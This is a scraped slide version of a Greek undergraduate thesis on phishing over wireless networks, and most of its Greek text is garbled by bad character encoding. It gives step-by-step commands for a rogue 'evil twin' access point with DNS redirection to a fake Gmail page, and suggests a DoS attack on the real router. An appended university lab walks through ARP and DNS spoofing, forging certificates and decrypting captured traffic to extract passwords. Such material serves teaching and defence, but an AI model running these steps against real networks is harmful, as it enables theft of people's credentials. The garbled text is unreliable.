'.$uri.'/gmail.php'); exit; ?> Something is wrong with the XAMPP installation :-(
16 airbase-ng -e "Castle" -c 9 mon0 #όπνπ Castle βάδνπκε ην ssid ηνπ δηθηύνπ ζην νπνίν ζέινπκε λα παξεκβιεζνύκε Γεκηνπξγνύκε έηζη κηα δηεπηθάλεηα παξαθνινύζεζεο (TAP interface), κε όλνκα at0, ε νπνία εμνκνηώλεη κηα ζπζθεπή δηθηύνπ θαη ιεηηνπξγεί κε παθέηα layer 2. ΢ηε ζπλέρεηα μεθηλάκε ηε ιεηηνπξγία ηνπ πιαζηνύ Access Point καο. Σν SSID ηνπ είλαη Castle, ηξέρεη ζην θαλάιη 9 ρσξίο θξππηνγξάθεζε θαη ρξεζηκνπνηεί ηελ εηθνληθή ζπζθεπή mon0 πνπ δεκηνπξγήζακε λσξίηεξα. Αθήλνπκε απηό ην παξάζπξν ηνπ terminal αλνηρηό γηα λα ζπλερίζεη λα ιεηηνπξγεί ν ππνινγηζηήο καο σο router. Δδώ κπνξνύκε λα δνύκε θαη ηε MAC δηεύζπλζε όπνηαο ζπζθεπήο ζπλδεζεί. ΢ηε ζπλέρεηα, ζε έλα άιιν terminal, αθνύ απνθηήζνπκε πάιη δηθαηώκαηα δηαρεηξηζηή, ελεξγνπνηνύκε ην interface θαη ζέηνπκε ην subnet θαη ηελ gateway γηα ην at0 interface κε ηηο αθόινπζεο εληνιέο: ifconfig at0 up
17 ifconfig at0 192.168.2.129 netmask 255.255.255.128 route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 ΢ε απηό ην ζεκείν θάλνπκε restart ην dhcpd /etc/init.d/dhcp3-server restart εθθηλνύκε ην dnsmasq, /etc/init.d/dnsmasq start ηνλ lampp, /opt/lamp/lamp start θαη ζηε ζπλέρεηα ξπζκίδνπκε ηα iptables ώζηε λα δξνκνινγνύλ ηελ θίλεζε πνπ δε καο ελδηαθέξεη λα επεξεάζνπκε από ην router καο ζηελ ζύλδεζε ζην internet. iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo 1 > /proc/sys/net/ipv4/ip_forward iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE Σν eth1 αληηζηνηρεί ζην interface κε ην νπνίν ζπλδέεηαη ν δηθόο καο ππνινγηζηήο ζην internet όπσο είδακε κε ηελ iwconfig. iptables --append FORWARD --in-interface at0 -j ACCEPTifconfig at0 up ifconfig at0 192.168.2.129 netmask 255.255.255.128 Σν access point είλαη έηνηκν λα δερηεί αλππνςίαζηνπο ρξήζηεο.
18 5.3 ΢ελάξηα Υξήζεο Ο πην απιόο ηξόπνο ππνθινπήο δεδνκέλσλ είλαη ε ξύζκηζε θαη εγθαηάζηαζε ηνπ netbook θνληά ζε έλα access point ηνπ νπνίνπ νη ρξήζηεο θάλνπλ ζπνξαδηθή ρξήζε, όπσο ζε κηα θαθεηέξηα. Με ζηόρν λα παξαπιαλεζεί ν ρξήζηεο, ην access point καο ζα έρεη ίδην SSID κε απηό πνπ ζέινπκε λα ππνδπζνύκε. Γηα θαιύηεξα απνηειέζκαηα, κπνξνύκε λα ρξεζηκνπνηήζνπκε κηα θάξηα αζύξκαηνπ δηθηύνπ κε κεγαιύηεξε ηζρύ από απηή ηνπ access point, ώζηε θαη έλαο ππνινγηζηήο λα “πξνηηκήζεη” λα ζπλδεζεί κε εκάο αληί κε ην θαλνληθό access point. Δλαιιαθηηθά κπνξνύκε λα πξνζπαζήζνπκε λα ξίμνπκε ην router είηε αιιάδνληαο ηηο ξπζκίζεηο ηνπ από ην web interface είηε, αλ έρεη δπλαηό password ή δε δίλεηαη πξόζβαζε ζε απηό από αζύξκαηε ζύλδεζε, λα ην “ξίμνπκε” κε DOS attack (επίζεζε ηύπνπ Denial Of Service). 6. Σξόπνη Πξνζηαζίαο Τπάξρνπλ αξθεηέο ηερληθέο θαηαπνιέκεζεο ηνπ phishing, αλάκεζά ηνπο θαη ηερλνινγηθά εξγαιεία, αιιά ε θαιύηεξε αληηκεηώπηζε είλαη ε ελδπλάκσζε ηνπ πην αδύλακνπ θξίθνπ ηεο δηαδηθαζίαο πνπ είλαη ν αλζξώπηλνο παξάγνληαο. Με θαηάιιειε εθπαίδεπζε, νη κε έκπεηξνη ρξήζηεο κπνξνύλ λα αλαγλσξίδνπλ απόπεηξεο phishing, θαη λα κελ πέθηνπλ ζύκαηα ησλ παξαπιαλεηηθώλ κελπκάησλ. ΢ηηο πεξηπηώζεηο πνπ έλα email δείρλεη λα πξνέξρεηαη όλησο από κηα πξαγκαηηθή ππεξεζία πνπ ρξεζηκνπνηνύκε θαη καο πξνηξέπεη ζε θάπνηα ελέξγεηα, όπσο επηθύξσζε ζηνηρείσλ, είλαη πην αζθαιέο λα κε ρξεζηκνπνηήζνπκε θάπνην από ηα links πνπ πεξηέρνληαη ζε απηό, αιιά λα επηζθεθηνύκε ηε ζειίδα πιεθηξνινγώληαο ηε δηεύζπλζε θαη λα δνύκε θαη εθεί ηπρόλ επηζεκάλζεηο. Φπζηθά κε ην ζελάξην επίζεζεο phising πνπ πινπνηήζακε, αθόκε θαη απηή ε κέζνδνο ίζσο λα ήηαλ επηζθαιήο. Η κόλε απνηειεζκαηηθή πξνζηαζία γηα απηνύ ηνπ ηύπνπ ηηο επηζέζεηο, είλαη λα κελ ζπλδεόκαζηε ζε δίθηπα ρσξίο αζθάιεηα ηα νπνία δε γλσξίδνπκε θαη αθόκε θαη αλ ηα γλσξίδνπκε, αλ δελ παξέρνπλ θάπνηα κέζνδν απζεληηθνπνίεζεο. Δπίζεο, όηαλ αληαιιάζνπκε επαίζζεηεο πιεξνθνξίεο, όπσο
19 αξηζκνύο πηζησηηθώλ θαξηώλ θαη θσδηθνύο πξόζβαζεο, βεβαησλόκαζηε όηη ππάξρνπλ ηα θαηάιιεια αλαγλσξηζηηθά αζθαινύο ζύλδεζεο κε ηελ ππεξεζία πνπ καο ελδηαθέξεη (ζπλήζσο εηθνλίδηα ινπθέησλ ζηελ address bar θαη ζηελ θάησ κπάξα ηνπ browser) θαη όηη ην πηζηνπνηεηηθό αζθαιείαο έρεη εθδνζεί από γλσζηή θαη αμηόπηζηε εηαηξεία. Η ρξήζε πξνγξακκάησλ πνπ έρνπλ δεκηνπξγεζεί από ηηο εηαηξείεο παξνρήο ππεξεζηώλ ειεθηξνληθνύ ηαρπδξνκείνπ ή από ηελ εθάζηνηε ηξάπεδα θαη ρξεζηκνπνηνύληαη από θηλεηά (apps), ή ελζσκαηώλνληαη ζε browsers (plugins) είλαη πην αζθαιή θαζώο επηθνηλσλνύλ απεπζείαο κε ηνλ server απζεληηθνπνίεζεο ηνπ παξόρνπ θαη ρξεηάδεηαη κηα ηειείσο δηαθνξεηηθή θηινζνθία θαη πινπνίεζε γηα λα παξεκβιεζεί θάπνηνο θαθόβνπινο ζε απηή ηε δηαδηθαζία. 7. Παξάξηεκα Δπίζεζε Σύπνπ Man-in-the-Middle κε Ubuntu Linux ΢ην City College of San Francisco αλαηέζεθε ζηνπο ζπνπδαζηέο κηα εξγαζία κε αλαιπηηθέο νδεγίεο γηα ηελ πξαγκαηνπνίεζε επίζεζεο ζε θάπνην κεράλεκα ζην δίθηπό ηνπο, ώζηε λα ππνθιέςνπλ έλαλ θσδηθό gmail. Η πινπνίεζε είλαη παξόκνηα κε απηή πνπ ρξεζηκνπνηείηαη ζηελ παξνύζα πηπρηαθή, αιιά θάπνηα από ηα παθέηα πνπ ρξεζηκνπνηνύληαη γηα ηελ πινπνίεζή ηεο δελ ππνζηεξίδνληαη πηα ώζηε λα γίλεη πξαθηηθή ζύγθξηζε κεηαμύ ησλ δύν κεζόδσλ.
20 What You Will Need  An Ubuntu Linux computer with to use as the "Ubuntu Hacker Computer" (physical or virtual)  A "Gateway" to the Internet, such as a router  A "Victim Computer" running Windows, Linux, OS X, or any operating system that can use a Web browser. If the Ubuntu machine is a virtual machine, the host Windows XP system makes a handy victim. Finding the IP and MAC Addresses of the Victim Computer 1. You can use any machine for the victim computer, such as your Windows XP host machine. Click Start, "All Programs", Accessories, "Command Prompt" to a Command Prompt window on the victim computer. Type in this command, and press the Enter key: IPCONFIG 2. Find the "IP Address", as shown below on this page. If you have several network adapters, as we do in S214, there will be several sets of addresses shown. In S214, find the adapter with an IP address starting with 192.168.1. It's usually the Intel adapter, but not always. 3. Write the IP Address you just found, and the Default Gateway, in the box to the right on this page. Starting the Ubuntu Hacker Computer 4. Start your Ubuntu Linux virtual machine and log in as usual. Installing the Required Packages on to the Ubuntu Hacker Computer 5. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the terminal window, enter this command, then press the Enter key: sudo apt-get install dsniff Enter your password when you are prompted to. Press Y twice when you are prompted to. Wait until the messages stop, and you see the $ prompt. 6. In the terminal window, enter this command, then press the Enter key: sudo apt-get install fragrouter Warning: Only do this on networks you own. Cracking into networks without permission is a crime—don’t do it! Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : S214 IP Address. . . . . . . . . . . . : 192.168.1.28 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 IP of Victim: ___192.168.1…._____________ IP of Gateway: ___192.168.1.254_____________
21 Press Y when you are prompted to. Wait until the messages stop, and you see the $ prompt. 7. In the terminal window, enter this command, then press the Enter key: sudo apt-get install ssldump Wait until the messages stop, and you see the $ prompt. Using arpspoof to Redirect Network Traffic to the Ubuntu Hacker Computer 8. On the Ubuntu Hacker Computer, in the Terminal window,type in this command and press the Enter key : sudo arpspoof -t IP-of-Victim IP-of-Gateway Replace IP-of-Victim and IP-of-Gateway with the corresponding IP addresses you wrote on the first page of these instructions. Note that the IP addresses in the figure below are from my home network and not correct for S214. This command sends out ARP replies to the victim saying that the Gateway- IP is at the Hacker-Machine's MAC address. The victim's machine will just believe the ARP replies, so it will send all further Internet traffic to the Hacker Machine instead of the real Gateway. Leave this window open. Using fragrouter to Perform IP Forwarding on the Ubuntu Hacker Computer 9. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo fragrouter -B1 Enter your password when you are prompted to. The response is "fragrouter: base-1: normal IP forwarding". This command starts IP Forwarding, so the Hacker Computer will forward the packets it intercepts to their correct destination. That way the Victim will not know anything is wrong. Leave this window open. Using dnsspoof to Redirect all URLs to the Ubuntu Hacker Computer 10. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo dnsspoof
22 Enter your password when you are prompted to. The response is "dnsspoof: listening on eth0 [udp port 53 and not HackerIP]". This command starts a DNS server on the Hacker Computer which replies to all DNS requests with the hacker computers's IP address. The result is that all Internet traffic to all URLs will be sent to the Hacker Computer. Leave this window open. Using webmitm to Send and Receive Certificates 11. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo webmitm Enter your password when you are prompted to. This command sends X.509 Certificates to the Victim, and receives them from the Gateway. The certificates are real certificates, but they won't be verified by a Certificate Authority. This is the only way the Victim can tell they are being deceived. 12. You now have to answer a series of questions to determine what information will appear on your digital certificates: a. At the "Country Name (2 letter code) [AU]:" prompt, type "US" and press the Enter key. b. At the "State or Province Name (full name) [Some-State]:" prompt, type "CA" and press the Enter key. c. At the "Locality Name (eg, city) []:" prompt, type "San Francisco" and press the Enter key. d. At the "Organization Name (eg, company) [Intenet Widgits Pty Ltd]:" prompt, type "CCSF" and press the Enter key. e. At the "Organizational Unit Name (eg, section) []:" prompt, type "CNIT 123" and press the Enter key. f. At the "Common Name (eg, YOUR name) []:" prompt, type in "Student" and press the Enter key. g. At the "Email Address []:" prompt, type in "sbowne@ccsf.edu" and press the Enter key. h. At the "A challenge password []:" prompt, press the Enter key. i. At the "An optional company name []:" prompt, press the Enter key.
23 Checking the Four Windows 13. On the Hacker Computer, you should now have four windows open as shown below: a. A windows with arpspoof redirecting traffic to the "Hacker Computer" b. A window with fragrouter forwarding traffic c. A window with dnsspoof redirecting Web traffic to the "Hacker Computer" d. A window running webmitm to send and receive digital certificates arpspoof fragrouter dnsspoof webmitm
24 Opening the Gmail Login Page on the Victim Machine 14. On the Windows XP Victim Machine, open Internet Explorer and go to gmail.com. You should see the Security Warning shown below on this page. (If you have IE version 6, the message looks different.) This is your warning that the security certificate is not genuine. 15. Click "Continue to this website (not recommended)". 16. An "Information Bar" box pops up, as shown to the right on this page. Click the Close button. 17. Find the yellow "Information Bar" at the top of the browser window, which displays the message "To help protect your security, Internet Explorer has blocked this website from displaying content with security certificate errors. Click here for options…". Click the Information Bar and click "Display blocked content".
25 18. When you get to the Gmail login page, don't log in with your real Gmail account! The passwords could be stolen by anyone doing this project. Instead, enter the username and password shown below, but don't click the login button yet! Username: cnit.123open Password: 1337h4x0r Starting Wireshark to Record the Intercepted Traffic 19. On the Ubuntu Hacker Computer, from the Ubuntu menu bar, click Applications, Internet, "Wireshark (as root)". Enter your password when you are prompted to. 20. From the Wireshark menu bar, click Capture, Interfaces. 21. Find the line with your "Hacker Computer's" IP address in it, and click that Capture button. You should see the number of packets captured increasing. Opening the Gmail Login Page on the Victim Machine 22. On the Windows XP Victim Machine, in the Internet Explorer window, click the Log In button. This will send your username and password to Gmail. The man-in- the-middle attack is not perfect, so the login process will not complete—Internet Explorer will just hang. However, it goes far enough to send your password to the hacker. Decrypting the Captured Traffic on the Hacker Computer 23. On the "Hacker Computer", in the "Wireshark Capture" box, click Stop. Click File, Save. Type in a file name of "gmail" and click the Save button. 24. From the Ubuntu desktop, click Applications, Accessories, Terminal. In the Terminal window, type in this command and press the Enter key : sudo ssldump -r /root/gmail -k webmitm.crt -d > gmail-clear This command uses the digital certificate's key to decrypt the captured traffic, and puts the cleartext in the file gmail-clear in your home directory. 25. In the Terminal window, type in this command and press the Enter key : cat gmail-clear | grep Pass This command displays the lines in the gmail-clear file that contain "Pass". You should see the user name and password in cleartext, as indicated in the figure below.
26 Saving the Screen Image 26. Click outside the virtual machine to make its title bar dim. Press the PrntScn key to copy whole screen to the clipboard in the host Windows XP machine. Open Paint and paste in the image. Save it as a JPEG, with the filename Your Name Proj 25. Stopping the Attack and Returning to Normal Networking 27. On the Ubuntu machine, close all windows and shut down the system. 28. On the host Windows XP machine, close all windows and restart the system. Turning in your Project 29. Email the JPEG image to me as an attachment. Send the message to cnit.123@gmail.com with a subject line of Proj 25 From Your Name. Send a Cc to yourself.
27 Βηβιηνγξαθία Tan, Koon. “Phishing and Spamming via IM (SPIM)”. Internet Storm Center, Γεθέκβξηνο 2006. Mutton, Paul. “Phising Web Site Methods” FraudWatch International, Γεθέκβξηνο 2006. Jøsang, Audun et al.. “Security Usability Principles for Vulnerability Analysis and Risk Assessment.”, 2007. Financial Cryptography, “GP4.3 - Growth and Fraud – Case #3 – Phishing”, Γεθέκβξηνο 2005. The New York Times, “Virtual Goods Start Bringing Real Paydays”, Ννέκβξηνο 2009. “A Day With Tape” blog, Οθηώβξηνο 2009 Wikipedia, “Phising”.

Recomendados

Phising (ηλεκτρονικό ψάρεμα) - Σκυλλά
Phising (ηλεκτρονικό ψάρεμα) - ΣκυλλάPhising (ηλεκτρονικό ψάρεμα) - Σκυλλά
Phising (ηλεκτρονικό ψάρεμα) - ΣκυλλάΤμήμα Εμπορίας & Διαφήμισης (marketing) - ΤΕΙ Κρήτης
 
Χρήματα με εργασία από το σπίτι
Χρήματα με εργασία από το σπίτιΧρήματα με εργασία από το σπίτι
Χρήματα με εργασία από το σπίτιinternetbigmoneycom
 
ασφαλές διαδίκτυο
ασφαλές διαδίκτυοασφαλές διαδίκτυο
ασφαλές διαδίκτυοmntak1970
 
Project α3 2013_14
Project α3 2013_14Project α3 2013_14
Project α3 2013_14lykdrymou
 
Οδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.gr
Οδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.grΟδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.gr
Οδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.grsemifind
 
4 asfaleia diadiktyo
4 asfaleia diadiktyo4 asfaleia diadiktyo
4 asfaleia diadiktyoIoannis Padiotis
 
Emporio
EmporioEmporio
Emporiochrislemon
 
Προσωπικά δεδομένα και Διαδίκτυο
Προσωπικά δεδομένα και ΔιαδίκτυοΠροσωπικά δεδομένα και Διαδίκτυο
Προσωπικά δεδομένα και ΔιαδίκτυοΒάσω Κρικέλη
 

Recomendados

Phising (ηλεκτρονικό ψάρεμα) - Σκυλλά
Phising (ηλεκτρονικό ψάρεμα) - ΣκυλλάPhising (ηλεκτρονικό ψάρεμα) - Σκυλλά
Phising (ηλεκτρονικό ψάρεμα) - ΣκυλλάΤμήμα Εμπορίας & Διαφήμισης (marketing) - ΤΕΙ Κρήτης
 
Χρήματα με εργασία από το σπίτι
Χρήματα με εργασία από το σπίτιΧρήματα με εργασία από το σπίτι
Χρήματα με εργασία από το σπίτιinternetbigmoneycom
 
ασφαλές διαδίκτυο
ασφαλές διαδίκτυοασφαλές διαδίκτυο
ασφαλές διαδίκτυοmntak1970
 
Project α3 2013_14
Project α3 2013_14Project α3 2013_14
Project α3 2013_14lykdrymou
 
Οδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.gr
Οδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.grΟδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.gr
Οδηγός Ενδοεπιχειρησιακής Εκπαίδευσης - Semifind.grsemifind
 
4 asfaleia diadiktyo
4 asfaleia diadiktyo4 asfaleia diadiktyo
4 asfaleia diadiktyoIoannis Padiotis
 
Emporio
EmporioEmporio
Emporiochrislemon
 
Προσωπικά δεδομένα και Διαδίκτυο
Προσωπικά δεδομένα και ΔιαδίκτυοΠροσωπικά δεδομένα και Διαδίκτυο
Προσωπικά δεδομένα και ΔιαδίκτυοΒάσω Κρικέλη
 
το ηλεκτρονικό ψάρεμα (Phishing)
το ηλεκτρονικό ψάρεμα (Phishing)το ηλεκτρονικό ψάρεμα (Phishing)
το ηλεκτρονικό ψάρεμα (Phishing)Christos Sotiropoulos
 
Ασφαλείς στο Διαδίκτυο
Ασφαλείς στο ΔιαδίκτυοΑσφαλείς στο Διαδίκτυο
Ασφαλείς στο Διαδίκτυοpkaltsos
 
ανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςdimdemenika
 
ανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςdimdemenika
 
Company profile (Greek)
Company profile (Greek)Company profile (Greek)
Company profile (Greek)Panagiotis Christidis
 
ηλεκτρονική παρενόχληση
ηλεκτρονική παρενόχλησηηλεκτρονική παρενόχληση
ηλεκτρονική παρενόχλησηkukloforwgumnosstospiti
 
Thesis Net eshop
Thesis Net eshopThesis Net eshop
Thesis Net eshopMGAKIS
 
απάτες Internet.pptx
απάτες Internet.pptxαπάτες Internet.pptx
απάτες Internet.pptxΦΩΤΕΙΝΗ ΧΑΤΖΗΠΑΠΑ
 
Aσφαλησ πλοηγηση
Aσφαλησ πλοηγησηAσφαλησ πλοηγηση
Aσφαλησ πλοηγησηdimdemenika
 
Presentation τελικη
Presentation τελικηPresentation τελικη
Presentation τελικηnastazia_91
 
ασφαλεσ διαδικτυο χρηστος νικολας
ασφαλεσ διαδικτυο χρηστος νικολαςασφαλεσ διαδικτυο χρηστος νικολας
ασφαλεσ διαδικτυο χρηστος νικολαςdimdemenika
 
Χρήματα και Δικτυακό Μάρκετινγκ
Χρήματα και Δικτυακό ΜάρκετινγκΧρήματα και Δικτυακό Μάρκετινγκ
Χρήματα και Δικτυακό ΜάρκετινγκVassilis (BIll) Panopoulos M.B.A., M.H.R.M., M.M.M.
 
Passage media digital signage-synopsis
Passage media digital signage-synopsisPassage media digital signage-synopsis
Passage media digital signage-synopsisAnna Tergazi
 
ασφαλεια στο διαδικτυο
ασφαλεια στο διαδικτυοασφαλεια στο διαδικτυο
ασφαλεια στο διαδικτυοgia24
 
μέσα κοινωνικής δικτύωσης
μέσα κοινωνικής δικτύωσηςμέσα κοινωνικής δικτύωσης
μέσα κοινωνικής δικτύωσηςvassogova
 
Saferinternet newsletter issue4_2013
Saferinternet newsletter issue4_2013Saferinternet newsletter issue4_2013
Saferinternet newsletter issue4_2013Tsormpatzoglou Nestor
 
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.Stathis Gourzis
 
προστασίαλογισμικούιοί
προστασίαλογισμικούιοίπροστασίαλογισμικούιοί
προστασίαλογισμικούιοίmgiota
 
προστασία λογισμικού ιοί
προστασία λογισμικού ιοίπροστασία λογισμικού ιοί
προστασία λογισμικού ιοίPanagiota Mitsopoulou
 
Web 2.0 Εργαλεία
Web 2.0 ΕργαλείαWeb 2.0 Εργαλεία
Web 2.0 Εργαλείαagathoula
 

Mais conteúdo relacionado

Semelhante a Phising without a thread

το ηλεκτρονικό ψάρεμα (Phishing)
το ηλεκτρονικό ψάρεμα (Phishing)το ηλεκτρονικό ψάρεμα (Phishing)
το ηλεκτρονικό ψάρεμα (Phishing)Christos Sotiropoulos
 
Ασφαλείς στο Διαδίκτυο
Ασφαλείς στο ΔιαδίκτυοΑσφαλείς στο Διαδίκτυο
Ασφαλείς στο Διαδίκτυοpkaltsos
 
ανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςdimdemenika
 
ανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςdimdemenika
 
ηλεκτρονική παρενόχληση
ηλεκτρονική παρενόχλησηηλεκτρονική παρενόχληση
ηλεκτρονική παρενόχλησηkukloforwgumnosstospiti
 
Thesis Net eshop
Thesis Net eshopThesis Net eshop
Thesis Net eshopMGAKIS
 
Aσφαλησ πλοηγηση
Aσφαλησ πλοηγησηAσφαλησ πλοηγηση
Aσφαλησ πλοηγησηdimdemenika
 
Presentation τελικη
Presentation τελικηPresentation τελικη
Presentation τελικηnastazia_91
 
ασφαλεσ διαδικτυο χρηστος νικολας
ασφαλεσ διαδικτυο χρηστος νικολαςασφαλεσ διαδικτυο χρηστος νικολας
ασφαλεσ διαδικτυο χρηστος νικολαςdimdemenika
 
Passage media digital signage-synopsis
Passage media digital signage-synopsisPassage media digital signage-synopsis
Passage media digital signage-synopsisAnna Tergazi
 
ασφαλεια στο διαδικτυο
ασφαλεια στο διαδικτυοασφαλεια στο διαδικτυο
ασφαλεια στο διαδικτυοgia24
 
μέσα κοινωνικής δικτύωσης
μέσα κοινωνικής δικτύωσηςμέσα κοινωνικής δικτύωσης
μέσα κοινωνικής δικτύωσηςvassogova
 
Saferinternet newsletter issue4_2013
Saferinternet newsletter issue4_2013Saferinternet newsletter issue4_2013
Saferinternet newsletter issue4_2013Tsormpatzoglou Nestor
 
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.Stathis Gourzis
 
προστασίαλογισμικούιοί
προστασίαλογισμικούιοίπροστασίαλογισμικούιοί
προστασίαλογισμικούιοίmgiota
 
προστασία λογισμικού ιοί
προστασία λογισμικού ιοίπροστασία λογισμικού ιοί
προστασία λογισμικού ιοίPanagiota Mitsopoulou
 
Web 2.0 Εργαλεία
Web 2.0 ΕργαλείαWeb 2.0 Εργαλεία
Web 2.0 Εργαλείαagathoula
 

Semelhante a Phising without a thread (20)

το ηλεκτρονικό ψάρεμα (Phishing)
το ηλεκτρονικό ψάρεμα (Phishing)το ηλεκτρονικό ψάρεμα (Phishing)
το ηλεκτρονικό ψάρεμα (Phishing)
 
Ασφαλείς στο Διαδίκτυο
Ασφαλείς στο ΔιαδίκτυοΑσφαλείς στο Διαδίκτυο
Ασφαλείς στο Διαδίκτυο
 
ανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλος
 
ανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλοςανδριόπουλος φωτόπουλος
ανδριόπουλος φωτόπουλος
 
Company profile (Greek)
Company profile (Greek)Company profile (Greek)
Company profile (Greek)
 
ηλεκτρονική παρενόχληση
ηλεκτρονική παρενόχλησηηλεκτρονική παρενόχληση
ηλεκτρονική παρενόχληση
 
Thesis Net eshop
Thesis Net eshopThesis Net eshop
Thesis Net eshop
 
απάτες Internet.pptx
απάτες Internet.pptxαπάτες Internet.pptx
απάτες Internet.pptx
 
Aσφαλησ πλοηγηση
Aσφαλησ πλοηγησηAσφαλησ πλοηγηση
Aσφαλησ πλοηγηση
 
Presentation τελικη
Presentation τελικηPresentation τελικη
Presentation τελικη
 
ασφαλεσ διαδικτυο χρηστος νικολας
ασφαλεσ διαδικτυο χρηστος νικολαςασφαλεσ διαδικτυο χρηστος νικολας
ασφαλεσ διαδικτυο χρηστος νικολας
 
Χρήματα και Δικτυακό Μάρκετινγκ
Χρήματα και Δικτυακό ΜάρκετινγκΧρήματα και Δικτυακό Μάρκετινγκ
Χρήματα και Δικτυακό Μάρκετινγκ
 
Passage media digital signage-synopsis
Passage media digital signage-synopsisPassage media digital signage-synopsis
Passage media digital signage-synopsis
 
ασφαλεια στο διαδικτυο
ασφαλεια στο διαδικτυοασφαλεια στο διαδικτυο
ασφαλεια στο διαδικτυο
 
μέσα κοινωνικής δικτύωσης
μέσα κοινωνικής δικτύωσηςμέσα κοινωνικής δικτύωσης
μέσα κοινωνικής δικτύωσης
 
Saferinternet newsletter issue4_2013
Saferinternet newsletter issue4_2013Saferinternet newsletter issue4_2013
Saferinternet newsletter issue4_2013
 
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.
Τεχνολογια Δικτυων Ηλεκτρονικων Υπολογιστων - 2.
 
προστασίαλογισμικούιοί
προστασίαλογισμικούιοίπροστασίαλογισμικούιοί
προστασίαλογισμικούιοί
 
προστασία λογισμικού ιοί
προστασία λογισμικού ιοίπροστασία λογισμικού ιοί
προστασία λογισμικού ιοί
 
Web 2.0 Εργαλεία
Web 2.0 ΕργαλείαWeb 2.0 Εργαλεία
Web 2.0 Εργαλεία
 

Phising without a thread

  • 1. 0 ΠΑΝΔΠΙ΢ΣΗΜΙΟ ΠΔΙΡΑΙΧ΢ Σκήκα Φεθηαθώλ ΢πζηεκάησλ Phishing Without a Thread Δπίζεζε ηύπνπ phishing ζε αζύξκαην δίθηπν. Φνηηεηήο: Μάξθνο Υαηηάξη – Δ/04188 Δπηβιέπσλ Καζεγεηήο: Κσλζηαληίλνο Λακπξηλνπδάθεο
  • 2. 1 Πεξίιεςε ΢ηελ πηπρηαθή απηή εξγαζία ζα πξαγκαηνπνηεζεί κηα πξαθηηθή επίζεζε ηύπνπ phishing κε ζθνπό λα ππνθιαπνύλ νη θσδηθνί πξόζβαζεο ηνπ gmail account ελόο ρξήζηε. Υξεζηκνπνηνύκε έλαλ ππνινγηζηή ν νπνίνο ιεηηνπξγεί ζε πεξηβάιινλ Linux (Ubuntu, release 10.04) ν νπνίνο έρεη δηακνξθσζεί θαηάιιεια ώζηε λα ιεηηνπξγεί σο wireless router. Όηαλ ν ρξήζηεο ζπλδεζεί ζε απηό ην wireless router, δξνκνινγνύκε κε ρξήζε DNS Poisoning θάζε ηνπ πξνζπάζεηα λα κπεη ζην gmail, ζε κηα ηνπηθή ηζηνζειίδα παξόκνηα κε ην gmail, γηα λα ππνθιέςνπκε ηνπο θσδηθνύο πξόζβαζεο. Σα ζηνηρεία ηνπ ρξήζηε απνζεθεύνληαη ζε κηα βάζε δεδνκέλσλ. Σα πιενλεθηήκαηα ηεο κεζόδνπ απηήο ζε ζρέζε κε ζηνρεπκέλεο επηζέζεηο, νη νπνίεο απαηηνύλ από ηνλ ππνθινπέα λα παξαθνινπζεί ηελ θίλεζε ζην δίθηπν θαη λα ζηνρεύεη ηελ IP πνπ ηνλ ελδηαθέξεη, είλαη όηη ηόζν ε δξνκνιόγεζε όζν θαη ε απνζήθεπζε ησλ θσδηθώλ πξόζβαζεο είλαη πιήξσο απηνκαηνπνηεκέλε.
